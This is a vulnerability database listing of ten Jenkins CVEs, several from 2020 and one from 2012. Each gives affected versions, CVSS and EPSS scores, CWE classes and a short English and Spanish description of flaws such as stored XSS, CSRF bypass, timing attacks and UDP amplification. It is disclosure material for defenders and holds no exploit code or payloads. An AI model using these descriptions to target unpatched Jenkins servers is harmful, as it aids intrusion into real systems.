CVSS: 5.4EPSS: 0%CPEs: 2EXPL: 0CVE-2020-2161
https://notcve.org/view.php?id=CVE-2020-2161
25 Mar 2020 — Jenkins 2.227 and earlier, LTS 2.204.5 and earlier does not properly escape node labels that are shown in the form validation for label expressions on job configuration pages, resulting in a stored XSS vulnerability exploitable by users able to define node labels. Jenkins versiones 2.227 y anteriores, LTS versiones 2.204.5 y versiones anteriores, no se escapan apropiadamente las etiquetas de nodo que son mostradas en la comprobación del formulario para las expresiones de etiqueta en las páginas de configura... • http://www.openwall.com/lists/oss-security/2020/03/25/2 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 8.8EPSS: 0%CPEs: 2EXPL: 0CVE-2020-2160
https://notcve.org/view.php?id=CVE-2020-2160
25 Mar 2020 — Jenkins 2.227 and earlier, LTS 2.204.5 and earlier uses different representations of request URL paths, which allows attackers to craft URLs that allow bypassing CSRF protection of any target URL. Jenkins versiones 2.227 y anteriores, LTS versiones 2.204.5 y anteriores, usan diferentes representaciones de rutas URL de petición, lo cual permite a atacantes diseñar una URL que permite la omisión de la protección de CSRF de cualquier URL objetivo. • http://www.openwall.com/lists/oss-security/2020/03/25/2 • CWE-352: Cross-Site Request Forgery (CSRF) •
CVSS: 7.8EPSS: 1%CPEs: 4EXPL: 0CVE-2012-0785
https://notcve.org/view.php?id=CVE-2012-0785
24 Feb 2020 — Hash collision attack vulnerability in Jenkins before 1.447, Jenkins LTS before 1.424.2, and Jenkins Enterprise by CloudBees 1.424.x before 1.424.2.1 and 1.400.x before 1.400.0.11 could allow remote attackers to cause a considerable CPU load, aka "the Hash DoS attack." Una vulnerabilidad de ataque de colisión de hash en Jenkins versiones anteriores a 1.447, Jenkins LTS versiones anteriores a 1.424.2 y Jenkins Enterprise de CloudBees versiones 1.424.x anteriores a 1.424.2.1 y versiones 1.400.x anteriores a 1... • http://www.openwall.com/lists/oss-security/2012/01/20/8 • CWE-400: Uncontrolled Resource Consumption •
CVSS: 5.4EPSS: 1%CPEs: 2EXPL: 0CVE-2020-2105
https://notcve.org/view.php?id=CVE-2020-2105
29 Jan 2020 — REST API endpoints in Jenkins 2.218 and earlier, LTS 2.204.1 and earlier were vulnerable to clickjacking attacks. Los endpoint de la API REST en Jenkins versiones 2.218 y anteriores, versiones LTS 2.204.1 y anteriores, eran vulnerables a los ataques de secuestro de cliqueo. • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-1021: Improper Restriction of Rendered UI Layers or Frames •
CVSS: 5.4EPSS: 27%CPEs: 2EXPL: 0CVE-2020-2103
https://notcve.org/view.php?id=CVE-2020-2103
29 Jan 2020 — Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a user's detail object in the whoAmI diagnostic page. Jenkins versiones 2.218 y anteriores, versiones LTS 2.204.1 y anteriores, expuso identificadores de sesión en un objeto de detalles de usuario en la página de diagnóstico whoAmI. • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor •
CVSS: 4.3EPSS: 0%CPEs: 2EXPL: 0CVE-2020-2104
https://notcve.org/view.php?id=CVE-2020-2104
29 Jan 2020 — Jenkins 2.218 and earlier, LTS 2.204.1 and earlier allowed users with Overall/Read access to view a JVM memory usage chart. Jenkins versiones 2.218 y anteriores, versiones LTS 2.204.1 y anteriores, permitieron a usuarios con acceso General y de Lectura visualizar un gráfico de uso de memoria de JVM. • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-863: Incorrect Authorization •
CVSS: 5.3EPSS: 0%CPEs: 2EXPL: 0CVE-2020-2101
https://notcve.org/view.php?id=CVE-2020-2101
29 Jan 2020 — Jenkins 2.218 and earlier, LTS 2.204.1 and earlier did not use a constant-time comparison function for validating connection secrets, which could potentially allow an attacker to use a timing attack to obtain this secret. Jenkins versiones 2.218 y anteriores, versiones LTS 2.204.1 y anteriores, no usaban una función de comparación de tiempo constante para comprobar secretos de conexión, lo que podría potencialmente permitir a un atacante usar un ataque de sincronización para obtener este secreto. • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-203: Observable Discrepancy •
CVSS: 5.3EPSS: 0%CPEs: 2EXPL: 0CVE-2020-2102
https://notcve.org/view.php?id=CVE-2020-2102
29 Jan 2020 — Jenkins 2.218 and earlier, LTS 2.204.1 and earlier used a non-constant time comparison function when validating an HMAC. Jenkins versiones 2.218 y anteriores, versiones LTS 2.204.1 y anteriores, usó una función de comparación de tiempo no constante cuando se compara un HMAC. • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-203: Observable Discrepancy •
CVSS: 5.8EPSS: 0%CPEs: 2EXPL: 0CVE-2020-2100
https://notcve.org/view.php?id=CVE-2020-2100
29 Jan 2020 — Jenkins 2.218 and earlier, LTS 2.204.1 and earlier was vulnerable to a UDP amplification reflection denial of service attack on port 33848. Jenkins versiones 2.218 y anteriores, versiones LTS 2.204.1 y anteriores, eran vulnerables a un ataque de denegación de servicio de reflexión de amplificación UDP en el puerto 33848. • http://www.openwall.com/lists/oss-security/2020/01/29/1 •
CVSS: 8.6EPSS: 0%CPEs: 2EXPL: 0CVE-2020-2099
https://notcve.org/view.php?id=CVE-2020-2099
29 Jan 2020 — Jenkins 2.213 and earlier, LTS 2.204.1 and earlier improperly reuses encryption key parameters in the Inbound TCP Agent Protocol/3, allowing unauthorized attackers with knowledge of agent names to obtain the connection secrets for those agents, which can be used to connect to Jenkins, impersonating those agents. Jenkins versiones 2.213 y anteriores, versiones LTS 2.204.1 y anteriores, reutilizan inapropiadamente los parámetros de clave de cifrado en el Inbound TCP Agent Protocol/3, permitiendo a atacantes n... • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-330: Use of Insufficiently Random Values •